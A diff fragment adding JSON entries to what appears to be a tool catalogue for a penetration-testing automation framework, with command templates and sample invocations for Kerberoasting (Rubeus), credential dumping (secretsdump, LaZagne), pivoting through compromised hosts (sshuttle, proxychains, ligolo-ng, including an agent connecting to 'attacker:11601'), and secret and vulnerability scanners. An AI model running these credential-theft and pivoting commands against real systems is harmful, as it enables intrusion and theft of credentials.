|
+
"timeout": 300
|
|
361
|
+
},
|
|
362
|
+
{
|
|
363
|
+
"name": "rubeus",
|
|
364
|
+
"description": "Kerberos attack toolkit. Kerberoasting, AS-REP roasting, ticket manipulation.",
|
|
365
|
+
"cmd": "Rubeus.exe kerberoast",
|
|
366
|
+
"keywords": ["kerberos", "kerberoast", "ticket", "ad", "tgt", "tgs"],
|
|
367
|
+
"samples": ["Rubeus.exe kerberoast", "Rubeus.exe asreproast"],
|
|
368
|
+
"phase": "post",
|
|
369
|
+
"timeout": 120
|
|
370
|
+
},
|
|
371
|
+
{
|
|
372
|
+
"name": "secretsdump",
|
|
373
|
+
"description": "Impacket tool to dump SAM, LSA secrets, cached creds from Windows.",
|
|
374
|
+
"cmd": "impacket-secretsdump {target}",
|
|
375
|
+
"keywords": ["dump", "sam", "secrets", "hash", "ntds", "dcsync"],
|
|
376
|
+
"samples": ["secretsdump.py domain/user:pass@dc", "secretsdump.py -hashes :hash user@target"],
|
|
377
|
+
"phase": "post",
|
|
378
|
+
"timeout": 120
|
|
379
|
+
},
|
|
380
|
+
{
|
|
381
|
+
"name": "lazagne",
|
|
382
|
+
"description": "Credential recovery tool. Extracts passwords from browsers, mail, wifi, etc.",
|
|
383
|
+
"cmd": "lazagne.exe all",
|
|
384
|
+
"keywords": ["credential", "browser", "password", "wifi", "recovery"],
|
|
385
|
+
"samples": ["lazagne.exe all", "python laZagne.py all"],
|
|
386
|
+
"phase": "post",
|
|
387
|
+
"timeout": 120
|
|
388
|
+
},
|
|
389
|
+
{
|
|
390
|
+
"name": "sshuttle",
|
|
391
|
+
"description": "Transparent proxy/VPN over SSH. Pivot through compromised hosts.",
|
|
392
|
+
"cmd": "sshuttle -r user@{target} 10.0.0.0/8",
|
|
393
|
+
"keywords": ["vpn", "pivot", "ssh", "tunnel", "proxy"],
|
|
394
|
+
"samples": ["sshuttle -r user@pivot 10.0.0.0/8", "sshuttle -r root@target 0/0"],
|
|
395
|
+
"phase": "post",
|
|
396
|
+
"timeout": 600
|
|
397
|
+
},
|
|
398
|
+
{
|
|
399
|
+
"name": "proxychains",
|
|
400
|
+
"description": "Force connections through proxy. Chain tools through SOCKS/HTTP proxies.",
|
|
401
|
+
"cmd": "proxychains nmap -sT {target}",
|
|
402
|
+
"keywords": ["proxy", "socks", "chain", "pivot", "tunnel"],
|
|
403
|
+
"samples": ["proxychains nmap -sT 10.0.0.1", "proxychains curl target"],
|
|
404
|
+
"phase": "post",
|
|
405
|
+
"timeout": 300
|
|
406
|
+
},
|
|
407
|
+
{
|
|
408
|
+
"name": "ligolo-ng",
|
|
409
|
+
"description": "Advanced tunneling tool. Create tunnels for pivoting without needing SOCKS.",
|
|
410
|
+
"cmd": "ligolo-ng -selfcert",
|
|
411
|
+
"keywords": ["tunnel", "pivot", "ligolo", "network"],
|
|
412
|
+
"samples": ["./proxy -selfcert", "./agent -connect attacker:11601"],
|
|
413
|
+
"phase": "post",
|
|
414
|
+
"timeout": 600
|
|
415
|
+
},
|
|
416
|
+
{
|
|
417
|
+
"name": "trivy",
|
|
418
|
+
"description": "Vulnerability scanner for containers, filesystems, git repos. CVE detection.",
|
|
419
|
+
"cmd": "trivy image {target}",
|
|
420
|
+
"keywords": ["container", "docker", "vulnerability", "cve", "sbom", "scan"],
|
|
421
|
+
"samples": ["trivy image nginx:latest", "trivy fs ./app", "trivy repo github.com/user/repo"],
|
|
422
|
+
"phase": "recon",
|
|
423
|
+
"timeout": 300
|
|
424
|
+
},
|
|
425
|
+
{
|
|
426
|
+
"name": "trufflehog",
|
|
427
|
+
"description": "Secret scanner. Finds credentials, API keys in git repos and filesystems.",
|
|
428
|
+
"cmd": "trufflehog git {target}",
|
|
429
|
+
"keywords": ["secret", "credential", "api key", "git", "leak"],
|
|
430
|
+
"samples": ["trufflehog git https://github.com/user/repo", "trufflehog filesystem /path"],
|
|
431
|
+
"phase": "recon",
|
|
432
|
+
"timeout": 300
|
|
433
|
+
},
|
|
434
|
+
{
|
|
435
|
+
"name": "gitleaks",
|
|
436
|
+
"description": "Git secret scanner. Detect hardcoded secrets in git history.",
|
|
437
|
+
"cmd": "gitleaks detect --source {target}",
|
|
438
|
+
"keywords": ["secret", "git", "credential", "leak", "history"],
|
|
439
|
+
"samples": ["gitleaks detect --source .", "gitleaks detect --source /repo --report-path report.json"],
|
|
440
|
+
"phase": "recon",
|
|
441
|
+
"timeout": 300
|
|
442
|
+
}
|
|
443
|
+
]
|